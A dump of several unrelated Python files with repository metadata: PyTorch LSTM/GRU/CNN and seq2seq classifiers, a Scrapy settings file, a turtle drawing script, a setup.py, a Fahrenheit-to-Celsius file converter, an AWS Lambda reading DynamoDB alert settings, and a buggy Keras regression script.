self.hidden2label1 = nn.Linear(self.hidden_dim, self.n_classes)
def forward(self, x, h_init, c_init):
# x = self.conv1(x)
# x = F.relu(x)
# x = self.conv2(x)
# x = F.relu(x)
# x = self.pool1(x)
# x = self.dropout1(x)
#
# x = self.conv3(x)
# x = F.relu(x)
# x = self.conv4(x)
# x = F.relu(x)
# x = self.pool2(x)
# x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
# x = self.linear1(x)
# x = F.relu(x)
#
# # Droput
# x = self.dropout1(x)
# cnn_x = F.relu(x)
# print('cnn_x', cnn_x.shape)
# LSTM
g_seq = x #.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
# Droput
lstm_out = self.dropout1(lstm_out)
# linear
lstm_out = self.hidden2label1(lstm_out) # activations are implicit
lstm_out = self.dropout1(lstm_out)
# output
scores = lstm_out
return scores, h_final, c_final
class MyLSTM(nn.Module):
def __init__(self, bi_dir):
super(MyLSTM, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
self.bi_dir = bi_dir
self.linear1 = nn.Linear(3000, 256)
self.dropout1 = nn.Dropout(0.4)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 256
self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
# linear
self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)
def forward(self, x, h_init, c_init):
x = self.linear1(x)
x = F.relu(x)
# x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# LSTM
g_seq = x.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
# Droput
lstm_out = self.dropout1(lstm_out)
# linear
lstm_out = self.hidden2label1(lstm_out) # activations are implicit
lstm_out = self.dropout1(lstm_out)
# output
scores = lstm_out
return scores, h_final, c_final
class MLP(nn.Module):
def __init__(self):
super(MLP, self).__init__()
self.n_classes = 5
self.layer1 = nn.Linear(3000, 256, bias=False)
self.layer2 = nn.Linear(256, self.n_classes, bias=False)
def forward(self, x):
x = x.reshape(x.size(0), x.size(1) * x.size(2))
y = self.layer1(x)
y = F.relu(y)
scores = self.layer2(y)
return scores
class ConvGRU(nn.Module):
def __init__(self, bi_dir):
super(ConvGRU, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
self.bi_dir = bi_dir
self.rnn_type = 'gru'
self.num_layers = 1
self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
self.pool1 = nn.MaxPool1d(2, stride=6)
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
self.pool2 = nn.MaxPool1d(2, stride=2)
# self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
# self.pool3 = nn.MaxPool1d(2, stride=1)
self.linear1 = nn.Linear(1728, 128)
self.dropout1 = nn.Dropout(0.4)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 128
self.gru = nn.GRU(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
# linear
self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)
def init_hidden(self, batch_size):
if self.rnn_type == 'gru':
return torch.zeros(self.num_layers, 1, self.hidden_dim)
elif self.rnn_type == 'lstm':
return (
torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim),
torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim))
def forward(self, x, gru_hidden):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.pool1(x)
x = self.dropout1(x)
x = self.conv3(x)
x = F.relu(x)
x = self.conv4(x)
x = F.relu(x)
x = self.pool2(x)
x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
cnn_x = F.relu(x)
# print('cnn_x', cnn_x.shape)
# LSTM
g_seq = cnn_x.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, gru_hidden = self.gru(g_seq, gru_hidden)
# Droput
lstm_out = self.dropout2(lstm_out)
# linear
cnn_lstm_out = self.hidden2label1(lstm_out) # activations are implicit
# output
scores = cnn_lstm_out
return scores, gru_hidden
# LL2: 128 --> classes
# x = self.linear2(x)
# return x
class ConvLSTM(nn.Module):
def __init__(self, bi_dir):
super(ConvLSTM, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
self.bi_dir = bi_dir
self.num_layers = 1
self.rnn_type = 'lstm'
self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
self.pool1 = nn.MaxPool1d(2, stride=6)
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
self.pool2 = nn.MaxPool1d(2, stride=2)
# self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
# self.pool3 = nn.MaxPool1d(2, stride=1)
self.linear1 = nn.Linear(1728, 128)
self.dropout1 = nn.Dropout(0.4)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 128
self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
# linear
self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)
# def init_hidden(self, batch_size):
# if self.rnn_type == 'gru':
# return torch.zeros(self.num_layers, batch_size, self.hidden_dim)
# elif self.rnn_type == 'lstm':
# return (
# torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim),
# torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim))
def forward(self, x, h_init, c_init):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.pool1(x)
x = self.dropout1(x)
x = self.conv3(x)
x = F.relu(x)
x = self.conv4(x)
x = F.relu(x)
x = self.pool2(x)
x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
cnn_x = F.relu(x)
# print('cnn_x', cnn_x.shape)
# LSTM
g_seq = cnn_x.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
# Droput
lstm_out = self.dropout2(lstm_out)
# linear
cnn_lstm_out = self.hidden2label1(lstm_out) # activations are implicit
# output
scores = cnn_lstm_out
return scores, h_final, c_final
# LL2: 128 --> classes
# x = self.linear2(x)
# return x
class ConvLSTMOld(nn.Module):
def __init__(self, bi_dir):
super(ConvLSTMOld, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
self.bi_dir = bi_dir
# CL1: 28 x 28 --> 64 x 3'000
self.conv1 = nn.Conv1d(1, 16, kernel_size=3, padding=1)
# MP1: 64 x 3'000 --> 64 x 1'500
self.pool1 = nn.MaxPool1d(2)
# CL2: 64 x 1'500 --> 64 x 1'500
self.conv2 = nn.Conv1d(16, 32, kernel_size=3, padding=1)
# MP2: 64 x 1'500 --> 64 x 750
self.pool2 = nn.MaxPool1d(2)
# CL3: 64 x 750 --> 64 x 750
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.to_pad = 1
# MP3: 64 x 750 --> 64 x 375
self.pool3 = nn.MaxPool1d(2, padding=self.to_pad)
self.linear1 = nn.Linear(24064, 128)
self.dropout1 = nn.Dropout(0.5)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 128
self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
# linear
self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)
def forward(self, x, h_init, c_init):
# print(x.shape)
# CL1: 1 x 3'000 --> 64 x 3'000
x = self.conv1(x)
x = F.relu(x)
# print(x.shape)
# MP1: 64 x 3'000 --> 64 x 1'500
x = self.pool1(x)
# print(x.shape)
x = self.dropout1(x)
# CL2: 64 x 1'500 --> 64 x 1'500
x = self.conv2(x)
x = F.relu(x)
# print(x.shape)
# MP2: 64 x 1'500 --> 64 x 750
x = self.pool2(x)
# print(x.shape)
# CL3: 64 x 750 --> 64 x 750
x = self.conv3(x)
x = F.relu(x)
# print(x.shape)
x = self.dropout1(x)
# MP3: 64 x 376 = 24'064
x = self.pool3(x)
# print(x.shape)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
cnn_x = F.relu(x)
# print('cnn_x', cnn_x.shape)
# LSTM
g_seq = cnn_x.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
# Droput
lstm_out = self.dropout1(lstm_out)
# linear
cnn_lstm_out = self.hidden2label1(lstm_out) # activations are implicit
# output
scores = cnn_lstm_out
return scores, h_final, c_final
class ConvSimple33(nn.Module):
def __init__(self):
super(ConvSimple33, self).__init__()
self.n_classes = 5
# CL1: 28 x 28 --> 64 x 3'000
self.conv1 = nn.Conv1d(1, 16, kernel_size=10, padding=1, stride=2)
# MP1: 64 x 3'000 --> 64 x 1'500
self.pool1 = nn.MaxPool1d(2, stride=4)
# CL2: 64 x 1'500 --> 64 x 1'500
self.conv2 = nn.Conv1d(16, 32, kernel_size=3, padding=1)
# MP2: 64 x 1'500 --> 64 x 750
self.pool2 = nn.MaxPool1d(2)
# CL3: 64 x 750 --> 64 x 750
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
# MP3: 64 x 750 --> 64 x 375
self.pool3 = nn.MaxPool1d(2, padding=1)
self.linear1 = nn.Linear(6016, 128)
self.dropout1 = nn.Dropout(0.5)
# LL2: 128 --> classes
self.linear2 = nn.Linear(128, self.n_classes)
def forward(self, x):
# print(x.shape)
# CL1: 1 x 3'000 --> 64 x 3'000
x = self.conv1(x)
x = F.relu(x)
# print(x.shape)
# MP1: 64 x 3'000 --> 64 x 1'500
x = self.pool1(x)
# print(x.shape)
x = self.dropout1(x)
# CL2: 64 x 1'500 --> 64 x 1'500
x = self.conv2(x)
x = F.relu(x)
# print(x.shape)
# MP2: 64 x 1'500 --> 64 x 750
x = self.pool2(x)
# print(x.shape)
# CL3: 64 x 750 --> 64 x 750
x = self.conv3(x)
x = F.relu(x)
# print(x.shape)
x = self.dropout1(x)
# MP3: 64 x 376 = 24'064
x = self.pool3(x)
# print(x.shape)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
# LL2: 128 --> classes
x = self.linear2(x)
return x
class ConvSimpleSOTA(nn.Module):
def __init__(self):
super(ConvSimpleSOTA, self).__init__()
self.n_classes = 5
self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
self.pool1 = nn.AvgPool1d(2, stride=6)
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
self.pool2 = nn.AvgPool1d(2, stride=2)
self.conv5 = nn.Conv1d(64, 256, kernel_size=3, padding=1)
self.conv6 = nn.Conv1d(256, 256, kernel_size=3, padding=1)
self.pool_avg = nn.AvgPool1d(2)
self.linear1 = nn.Linear(3328, 128)
self.dropout1 = nn.Dropout(0.2)
# LL2: 128 --> classes
self.linear2 = nn.Linear(128, self.n_classes)
def forward(self, x):
# print(x.shape)
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.pool1(x)
x = self.dropout1(x)
x = self.conv3(x)
x = F.relu(x)
x = self.conv4(x)
x = F.relu(x)
x = self.pool2(x)
x = self.dropout1(x)
x = self.conv5(x)
x = F.relu(x)
x = self.conv6(x)
x = F.relu(x)
x = self.pool_avg(x)
x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
# LL2: 128 --> classes
x = self.linear2(x)
return x
class ConvSimpleBest(nn.Module):
def __init__(self):
super(ConvSimpleBest, self).__init__()
self.n_classes = 5
self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
self.pool1 = nn.AvgPool1d(2, stride=6)
self.bn1 = nn.BatchNorm1d(num_features=32)
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
self.pool2 = nn.AvgPool1d(2, stride=2)
self.bn2 = nn.BatchNorm1d(num_features=64)
self.conv5 = nn.Conv1d(64, 256, kernel_size=3, padding=1)
self.conv6 = nn.Conv1d(256, 256, kernel_size=3, padding=1)
self.pool_avg = nn.AvgPool1d(2)
self.bn3 = nn.BatchNorm1d(num_features=256)
self.linear1 = nn.Linear(3328, 128)
self.dropout1 = nn.Dropout(0.02)
# LL2: 128 --> classes
self.linear2 = nn.Linear(128, self.n_classes)
def forward(self, x):
# print(x.shape)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.conv2(x)
x = self.bn1(x)
x = F.relu(x)
x = self.pool1(x)
# x = self.dropout1(x)
x = self.conv3(x)
x = self.bn2(x)
x = F.relu(x)
x = self.conv4(x)
x = self.bn2(x)
x = F.relu(x)
x = self.pool2(x)
# x = self.dropout1(x)
# x = self.conv4(x)
# x = F.relu(x)
# x = self.conv4(x)
# x = F.relu(x)
# x = self.pool2(x)
# x = self.dropout1(x)
x = self.conv5(x)
x = self.bn3(x)
x = F.relu(x)
x = self.conv6(x)
x = self.bn3(x)
x = F.relu(x)
x = self.pool_avg(x)
# x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
# LL2: 128 --> classes
x = self.linear2(x)
return x
class TCN00(nn.Module):
def __init__(self):
super(TCN00, self).__init__()
input_size = 1
output_size = 5
num_channels = [16]*4
kernel_size = 10
dropout = 0.2
self.tcn = TemporalConvNet(input_size, num_channels, kernel_size, dropout=dropout)
self.linear = nn.Linear(num_channels[-1], output_size)
self.sig = nn.Sigmoid()
def forward(self, x):
# x needs to have dimension (N, C, L) in order to be passed into CNN
output = self.tcn(x).transpose(1, 2)
output = self.linear(output).double()
return output # self.sig(output)
class TempConv(nn.Module):
def __init__(self):
super(TempConv, self).__init__()
self.n_classes = 5
self.conv1 = TemporalConvNet(1, 32, kernel_size=10)
self.conv2 = TemporalConvNet(32, 32, kernel_size=10)
self.pool1 = nn.AvgPool1d(2, stride=6)
self.conv3 = TemporalConvNet(32, 64, kernel_size=3)
self.conv4 = TemporalConvNet(64, 64, kernel_size=3)
self.pool2 = nn.AvgPool1d(2, stride=2)
self.conv5 = TemporalConvNet(64, 256, kernel_size=3)
self.conv6 = TemporalConvNet(256, 256, kernel_size=3)
self.pool_avg = nn.AvgPool1d(2)
self.linear1 = nn.Linear(3328, 128)
self.dropout1 = nn.Dropout(0.02)
# LL2: 128 --> classes
self.linear2 = nn.Linear(128, self.n_classes)
def forward(self, x):
# print(x.shape)
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.pool1(x)
# x = self.dropout1(x)
x = self.conv3(x)
x = F.relu(x)
x = self.conv4(x)
x = F.relu(x)
x = self.pool2(x)
# x = self.dropout1(x)
# x = self.conv4(x)
# x = F.relu(x)
# x = self.conv4(x)
# x = F.relu(x)
# x = self.pool2(x)
# x = self.dropout1(x)
x = self.conv5(x)
x = F.relu(x)
x = self.conv6(x)
x = F.relu(x)
x = self.pool_avg(x)
# x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
# LL2: 128 --> classes
x = self.linear2(x)
return x
class Encoder(nn.Module):
def __init__(self):
super().__init__()
self.input_dim = 3000
self.hid_dim = 64
self.n_layers = 1
self.dropout = 0.3
self.rnn = nn.LSTM(self.input_dim, self.hid_dim, self.n_layers, dropout=self.dropout)
self.dropout = nn.Dropout(self.dropout)
def forward(self, src):
outputs, (hidden, cell) = self.rnn(src)
# outputs = [src sent len, batch size, hid dim * n directions]
# hidden = [n layers * n directions, batch size, hid dim]
# cell = [n layers * n directions, batch size, hid dim]
# outputs are always from the top hidden layer
return hidden, cell
class Decoder(nn.Module):
def __init__(self):
super().__init__()
self.output_dim = 5
self.hid_dim = 64
self.n_layers = 1
self.dropout = 0.5
self.rnn = nn.LSTM(self.output_dim, self.hid_dim, self.n_layers, dropout=self.dropout)
self.out = nn.Linear(self.hid_dim, self.output_dim)
self.dropout = nn.Dropout(self.dropout)
def forward(self, input, hidden, cell):
# input = [batch size]
# hidden = [n layers * n directions, batch size, hid dim]
# cell = [n layers * n directions, batch size, hid dim]
# n directions in the decoder will both always be 1, therefore:
# hidden = [n layers, batch size, hid dim]
# context = [n layers, batch size, hid dim]
input = input.unsqueeze(0)
# input = [1, batch size]
# embedded = self.dropout(self.embedding(input))
# embedded = [1, batch size, emb dim]
output, (hidden, cell) = self.rnn(input, (hidden, cell))
# output = [sent len, batch size, hid dim * n directions]
# hidden = [n layers * n directions, batch size, hid dim]
# cell = [n layers * n directions, batch size, hid dim]
# sent len and n directions will always be 1 in the decoder, therefore:
# output = [1, batch size, hid dim]
# hidden = [n layers, batch size, hid dim]
# cell = [n layers, batch size, hid dim]
prediction = self.out(output.squeeze(0))
# prediction = [batch size, output dim]
return prediction, hidden, cell
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.device = device
assert encoder.hid_dim == decoder.hid_dim, \
"Hidden dimensions of encoder and decoder must be equal!"
assert encoder.n_layers == decoder.n_layers, \
"Encoder and decoder must have equal number of layers!"
def forward(self, src, trg, teacher_forcing_ratio=0.5):
# src = [src sent len, batch size]
# trg = [trg sent len, batch size]
# teacher_forcing_ratio is probability to use teacher forcing
# e.g. if teacher_forcing_ratio is 0.75 we use ground-truth inputs 75% of the time
batch_size = trg.shape[1]
max_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
# tensor to store decoder outputs
outputs = torch.zeros(max_len, batch_size, trg_vocab_size).to(self.device)
# last hidden state of the encoder is used as the initial hidden state of the decoder
hidden, cell = self.encoder(src)
# first input to the decoder is the <sos> tokens
input = trg[0, :]
for t in range(1, max_len):
# insert input token embedding, previous hidden and previous cell states
# receive output tensor (predictions) and new hidden and cell states
output, hidden, cell = self.decoder(input, hidden, cell)
# place predictions in a tensor holding predictions for each token
outputs[t] = output
# decide if we are going to use teacher forcing or not
teacher_force = random.random() < teacher_forcing_ratio
# get the highest predicted token from our predictions
top1 = output.argmax(1)
# if teacher forcing, use actual next token as next input
# if not, use predicted token
input = trg[t] if teacher_force else top1
return outputs
|
[
"ict.lotfi@gmail.com"
] |
ict.lotfi@gmail.com
|
469f0de51f71a670c2c97c116840ceeee506d79d
|
896f619c7a0ec175dc982c6741f3f5339972170f
|
/SuningPhones/SNPhones/settings.py
|
63c7930b1467b33a3fe662ee2e3c76f4ad7e2227
|
[] |
no_license
|
guowee/Spiders
|
f80c360e1a31a5fad99875b4114f913b26fa4c95
|
6a0eca5aae8bb967e3ae2f91184884411328960c
|
refs/heads/master
| 2021-05-31T03:03:47.003915
| 2016-02-24T08:09:49
| 2016-02-24T08:09:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,004
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for SNPhones project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'SNPhones'
SPIDER_MODULES = ['SNPhones.spiders']
NEWSPIDER_MODULE = 'SNPhones.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'SNPhones (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'SNPhones.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'SNPhones.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'SNPhones.pipelines.SnphonesPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"guowei@hipad.com"
] |
guowei@hipad.com
|
b0af8012a757037991610dc7af5768f0004a892a
|
d40aa60243a9c378adf7fee3e4a48639ac8d293c
|
/Session2/homework2/turtle2.py
|
00df8f2bb6ee2130b3cab15669efea67221049b4
|
[] |
no_license
|
peekachoo/dangthuhuyen-fundamental-c4e25
|
0bc0a83b515518d1a50bf2bbf67d628c1eeae990
|
372b17e65fc19d1c80da85e8ca94c0579904c0ae
|
refs/heads/master
| 2020-04-13T09:10:06.250844
| 2019-01-04T17:01:20
| 2019-01-04T17:01:20
| 163,103,818
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
from turtle import *
pencolor('red')
for i in range(4):
left(90)
forward(100)
for i in range(5):
left(60)
forward(100)
pencolor('blue')
left(120)
forward(100)
right(120)
forward(100)
left(132)
for i in range(4):
forward(100)
left(72)
mainloop()
|
[
"dhuyen135@gmail.com"
] |
dhuyen135@gmail.com
|
deda890d588f085cc6b869fe7ddee7392ab6638d
|
6dd524bf9d7879db62f86a62cceff3c5525fb2df
|
/setup.py
|
3690959e6d5cf0d67db6cfa9e455099ee10f14b4
|
[] |
no_license
|
ecbaldwin/git-replay
|
77a50ebc435f1d77f5f2f40bab8fb60aafc35236
|
dbc6da675542c77ff6fd95d073bb637677987bb1
|
refs/heads/master
| 2020-04-03T23:52:50.085883
| 2018-11-01T02:27:10
| 2018-11-01T02:27:10
| 155,632,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
#!/usr/bin/env python
# https://setuptools.readthedocs.io/en/latest/setuptools.html
from setuptools import find_packages
from setuptools import setup
setup(name="git-replay",
version="0.1",
description="Prototype utility to track a change in git",
author="Carl Baldwin",
author_email="carl@ecbaldwin.net",
url="https://github.com/ecbaldwin/git-replay",
packages=find_packages(),
entry_points={
'console_scripts': [
'git-graph = git_replay.graph_repo:main',
'git-replay = git_replay.main:main',
'post-rewrite = git_replay.post_rewrite:main',
'post-receive = git_replay.post_receive:main',
'update = git_replay.update:main',
]
})
|
[
"carl@ecbaldwin.net"
] |
carl@ecbaldwin.net
|
2e730b1cf94aef703f29d97960597a7988937916
|
110287a9411047697fdb1371a7034f8781363562
|
/f2c_file_read_write.py
|
a392fc974d2deb44fd6599367d9e620dfe4290c3
|
[] |
no_license
|
chipperrip/IN1900
|
d791c04f94607cedfe5a4ae5fb34b83475cb73cf
|
76603e6a6cbf1022913e435a217a45032c02b6fc
|
refs/heads/master
| 2020-03-29T09:30:57.714458
| 2020-02-03T17:23:30
| 2020-02-03T17:23:30
| 149,761,841
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
infile = open('Fdeg.dat', 'r')
for i in range (3):
infile.readline()
Fdegrees = []
Cdegrees = []
for line in infile:
F = line.split()[-1]
F = float(F)
C = (F-32)*5.0/9
Fdegrees.append(F)
Cdegrees.append(C)
print (Fdegrees)
print (Cdegrees)
infile.close()
outfile = open('F2C.txt', 'w')
for F,C in zip(Fdegrees, Cdegrees):
outfile.write('%4.2f %4.2f \n' %(C,F))
outfile.close()
|
[
"36035495+chipperrip@users.noreply.github.com"
] |
36035495+chipperrip@users.noreply.github.com
|
e49a598e24fcb2f3fe8cef6e157406fdbc6f48e5
|
b87cb4f34de3e02232b2a55d655f9942a7b545c7
|
/get_alerts_config.py
|
a83f4c76a76e52df9afb6603e3fe1c856fb90615
|
[] |
no_license
|
flowness/python
|
9aa787f4e17b2d32288209a8e883242a91e310ad
|
3c1c6a08daecdfcf828c4b6df9569ec51ac289ec
|
refs/heads/master
| 2020-03-18T06:20:45.459224
| 2018-06-11T16:35:26
| 2018-06-11T16:35:26
| 134,390,320
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
from __future__ import print_function
import json
import boto3
import get_alerts_utils
dynamo = boto3.client('dynamodb')
def respond(err, res=None):
print ("res"+ str(res))
print ("json res"+ json.dumps(res))
return {
'statusCode': '400' if err else '200',
'body': err.message if err else json.dumps(res),
'headers': {
'Content-Type': 'application/json',
},
}
def lambda_handler(event, context):
print("Received event: " + json.dumps(event, indent=2))
alerts = getAlertsConfig(event)
return respond(None, alerts)
def getAlertsConfig(event):
moduleSN = get_alerts_utils.getValueFromEvent(event, 'moduleSN', '')
response = dynamo.get_item(TableName='AlertConfig', Key=get_alerts_utils.getKeyForGetItem(moduleSN))
print("Response alerts config: " + str(response))
return response['Item']
|
[
"noreply@github.com"
] |
noreply@github.com
|
e188fe3e8363af471d648137e1b454dd8bea97e5
|
bc9ecde6f62bf8b8f1217737c0b14d87c5e52ce2
|
/ANN.py
|
f906cf0326f626712e9759bf56153486158d2673
|
[] |
no_license
|
Akshusharma7/Air_Quality_prediction
|
b2806c366b0e69a111f51858e00eac4e13f04fd1
|
e90160446a4c2e1412679f46706d68ae814d7ae5
|
refs/heads/master
| 2020-09-23T14:29:35.506005
| 2020-02-23T12:42:35
| 2020-02-23T12:42:35
| 225,521,098
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,277
|
py
|
#Importing library
import keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LeakyReLU,PReLU,ELU
from keras.layers import Dropout
NN_model = Sequential()
#The Input Layer:
NN_model.add(Dense(128,kernal_initializer='normal',input_dim= X_shape[1]))
#The Hidden Layers:
NN_model.add(Dense(256, Kernal_initializer='normal', activation='relu'))
NN_model.add(Dense(256, Kernal_initializer='normal', activation='relu'))
NN_model.add(Dense(256, Kernal_initializer='normal', activation='relu'))
#The Output:
NN_model.add(Dense(1,kernal_initializer='normal', activation='linear'))
#Compile the Network
NN_model.compile(loss='mean_absolute_error', optimizer='adam', metrics=['mean_absolute_error'])
NN_model.summary()
#Fitting the ANN to the Traning set
model_history = NN_model.fit(X_train, y_train, validation_split=0.33, batch_size = 10, nb_epoch= 100)
#Model Evaluation
prediction = NN_predict(X_test)
print(y_test)
#Shape of model evaluation
sns.distplot(y_test.values.reshape(-1,1)-prediction)
from sklearn import metrics
print("MAE: ",metrics.mean_absolute_error(y_test, predictions))
print("MSE: ",metrics.mean_squared_error(y_test, predictions))
